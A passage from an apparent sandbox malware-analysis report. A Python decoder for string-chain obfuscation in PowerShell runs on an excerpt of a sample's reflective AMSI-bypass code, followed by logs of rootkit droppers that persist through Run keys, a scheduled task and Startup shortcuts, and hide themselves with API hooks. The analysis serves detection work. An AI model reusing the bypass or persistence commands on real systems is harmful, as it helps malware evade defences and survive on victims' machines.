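    m = _LITERAL.fullmatch(term)
    if m:
        return m.group(1).replace("''", "'")
    raise ValueError(f"not a string term: {term!r}")


def eval_chain(chain: str) -> str:
    """Join every term of a '+'-chain into the string it builds."""
    terms = re.findall(_TERM, chain, flags=re.IGNORECASE)
    return "".join(_eval_term(t) for t in terms)


def decode(text: str) -> str:
    """Rewrite every chain in a script as a single quoted literal."""
    def repl(m):
        return "'" + eval_chain(m.group(0)).replace("'", "''") + "'"
    return _CHAIN.sub(repl, text)


def recovered_strings(text: str, min_terms: int = 2) -> list:
    """Strings hidden in chains of at least min_terms terms, in script
    order. Single literals are skipped because they are already readable."""
    found = []
    for m in _CHAIN.finditer(text):
        n_terms = len(re.findall(_TERM, m.group(0), flags=re.IGNORECASE))
        if n_terms >= min_terms:
            found.append(eval_chain(m.group(0)))
    return found


# Constructed excerpt: fragments copied from the powershell.exe command lines
# and AMSI captures in this report, joined and shortened for the example.
SAMPLE = (
    "$pNdjVVbnfJT=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object "
    "Reflection.AssemblyName(''+[Char](82)+''+'e'+''+[Char](102)+''+[Char](108)"
    "+''+[Char](101)+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''"
    "+[Char](68)+'e'+[Char](108)+''+[Char](101)+''+'g'+''+[Char](97)+''"
    "+[Char](116)+'e')),[Reflection.Emit.AssemblyBuilderAccess]::Run)"
    ".DefineDynamicModule('I'+'n'+''+[Char](77)+''+'e'+''+[Char](109)+''+'o'+''"
    "+'r'+'y'+[Char](77)+'o'+[Char](100)+''+[Char](117)+'l'+[Char](101)+'',$False)"
    ".DefineType(''+'M'+''+[Char](121)+'De'+'l'+'e'+[Char](103)+''+[Char](97)+''"
    "+[Char](116)+''+'e'+''+'T'+''+'y'+''+'p'+''+'e'+'',[MulticastDelegate]);"
    "$RJkdRlkUxkpOh=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{"
    "$_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals('Sy'+'s'+''"
    "+[Char](116)+''+[Char](101)+''+[Char](109)+''+[Char](46)+''+[Char](100)+'l'"
    "+[Char](108)+'')});"
    "GetDelegateForFunctionPointer($LadMSRasXMAaNc,$SsrFUvzfWALaJuFfDwp)"
    ".Invoke(''+'a'+''+[Char](109)+''+'s'+'i.'+[Char](100)+''+'ll');"
    "[Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'"
    "+[Char](70)+'T'+[Char](87)+'A'+[Char](82)+'E')"
)

if __name__ == "__main__":
    for s in recovered_strings(SAMPLE):
        print(s)
    print(decode(SAMPLE))
```

Run against SAMPLE, recovered_strings() yields ReflectedDelegate, InMemoryModule, MyDelegateType, System.dll, amsi.dll and SOFTWARE, which is the familiar reflective-delegate pattern: a delegate type is emitted at run time, a Microsoft.Win32 type inside System.dll is located (the .GetType(...) argument is cut off in the report, so the exact member name is not reproduced here), GetDelegateForFunctionPointer is used to call into amsi.dll, and the third AMSI capture then loads an assembly from a value under HKLM\SOFTWARE. Feeding decode() the full command line from the report is a quick way to confirm that reading before writing detections on the decoded text rather than on the raw chain.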
Source: C:\Users\Public\DeadXClient.exe; Code function: 1_2_00007FFD9B7F00AD pushad ; iretd 1_2_00007FFD9B7F00C1
Source: C:\Users\Public\DeadROOTkit.exe; Code function: 2_2_00007FFD9B80885D pushad ; ret 2_2_00007FFD9B8088EB
Source: C:\Users\Public\DeadROOTkit.exe; Code function: 2_2_00007FFD9B8088A8 pushad ; ret 2_2_00007FFD9B8088EB
Source: C:\Users\Public\DeadROOTkit.exe; Code function: 2_2_00007FFD9B8000AD pushad ; iretd 2_2_00007FFD9B8000C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 4_2_00007FFD9B7EDBB5 pushad ; iretd 4_2_00007FFD9B7EDC59
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 4_2_00007FFD9B7E63FB push ebx; retf 000Ah 4_2_00007FFD9B7E641A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 4_2_00007FFD9B7EDC35 pushad ; iretd 4_2_00007FFD9B7EDC59
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 4_2_00007FFD9B7EDC40 pushad ; iretd 4_2_00007FFD9B7EDC59
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 4_2_00007FFD9B7E00AD pushad ; iretd 4_2_00007FFD9B7E00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 4_2_00007FFD9BA651EB push ecx; iretd 4_2_00007FFD9BA651EC
Source: C:\Windows\System32\dllhost.exe; Code function: 6_3_000002E86A0786ED push rcx; retf 003Fh 6_3_000002E86A0786EE
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 7_2_00007FFD9B6BD2A5 pushad ; iretd 7_2_00007FFD9B6BD2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 7_2_00007FFD9B7D00AD pushad ; iretd 7_2_00007FFD9B7D00C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 7_2_00007FFD9B8A2316 push 8B485F94h; iretd 7_2_00007FFD9B8A231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Code function: 7_2_00007FFD9B8A26C9 pushad ; retf 7_2_00007FFD9B8A26E9
Source: C:\Windows\System32\winlogon.exe; Code function: 11_3_00000225DC6286ED push rcx; retf 003Fh 11_3_00000225DC6286EE
Source: C:\Windows\System32\lsass.exe; Code function: 12_3_00000202C0AC86ED push rcx; retf 003Fh 12_3_00000202C0AC86EE
Source: C:\Users\Public\Deadsvchost.exe; Code function: 13_2_00007FFD9B8000AD pushad ; iretd 13_2_00007FFD9B8000C1
Source: C:\Windows\System32\svchost.exe; Code function: 14_3_000002A6612E86ED push rcx; retf 003Fh 14_3_000002A6612E86EE
Source: C:\Windows\System32\dwm.exe; Code function: 16_3_000002BAAF1F86ED push rcx; retf 003Fh 16_3_000002BAAF1F86EE
Source: C:\Windows\System32\svchost.exe; Code function: 17_3_0000026A879A86ED push rcx; retf 003Fh 17_3_0000026A879A86EE
Source: C:\Windows\System32\svchost.exe; Code function: 19_3_00000179537886ED push rcx; retf 003Fh 19_3_00000179537886EE
Source: C:\Windows\System32\svchost.exe; Code function: 20_3_000002295D5486ED push rcx; retf 003Fh 20_3_000002295D5486EE

Persistence and Installation Behavior

Source: C:\Windows\System32\lsass.exe; Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Users\user\Desktop\mIURiU8n2P.exe; File created: C:\Users\Public\DeadROOTkit.exe
Source: C:\Users\Public\DeadROOTkit.exe; File created: C:\Users\user\AppData\Local\DeadROOTkit.exe
Source: C:\Users\user\Desktop\mIURiU8n2P.exe; File created: C:\Users\Public\DeadXClient.exe
Source: C:\Users\user\Desktop\mIURiU8n2P.exe; File created: C:\Users\Public\DeadCodeRootKit.exe
Source: C:\Users\Public\DeadXClient.exe; File created: C:\Users\Public\Deadsvchost.exe

Boot Survival

Source: C:\Users\Public\DeadXClient.exe; Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Deadsvchost
Source: C:\Users\Public\DeadROOTkit.exe; Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run DeadROOTkit
Source: C:\Users\user\Desktop\mIURiU8n2P.exe; File created: C:\Users\Public\DeadROOTkit.exe
Source: C:\Users\user\Desktop\mIURiU8n2P.exe; File created: C:\Users\Public\DeadXClient.exe
Source: C:\Users\user\Desktop\mIURiU8n2P.exe; File created: C:\Users\Public\DeadCodeRootKit.exe
Source: C:\Users\Public\DeadXClient.exe; File created: C:\Users\Public\Deadsvchost.exe
Source: C:\Users\Public\DeadXClient.exe; Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Deadsvchost" /tr "C:\Users\Public\Deadsvchost.exe"
Source: C:\Users\Public\DeadXClient.exe; File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Deadsvchost.lnk
Source: C:\Windows\System32\svchost.exe; File created: C:\Windows\System32\Tasks\DeadROOTkit
Source: C:\Users\Public\DeadROOTkit.exe; File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DeadROOTkit.lnk

Hooking and other Techniques for Hiding and Protection

Source: explorer.exe; IAT, EAT, inline or SSDT hook detected: function: NtQueryDirectoryFile
Source: explorer.exe; IAT, EAT, inline or SSDT hook detected: function: NtQuerySystemInformation
Source: explorer.exe; IAT, EAT, inline or SSDT hook detected: function: ZwEnumerateValueKey
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: explorer.exe; User mode code has changed: module: ntdll.dll function: ZwEnumerateKey new code: 0xE9 0x9C 0xC3 0x32 0x2C 0xCF
Source: C:\Users\Public\DeadCodeRootKit.exe; Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE Deadstager
Source: C:\Users\user\Desktop\mIURiU8n2P.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\DeadXClient.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\DeadROOTkit.exe; Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Users\Public\Deadsvchost.exe  Process information set: NOOPENFILEERRORBOX (20 identical entries)
                          Source: C:\Windows\System32\svchost.exe  Process information set: NOOPENFILEERRORBOX (2 identical entries)
                          Source: C:\Users\Public\Deadsvchost.exe  Process information set: NOOPENFILEERRORBOX (20 identical entries)
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
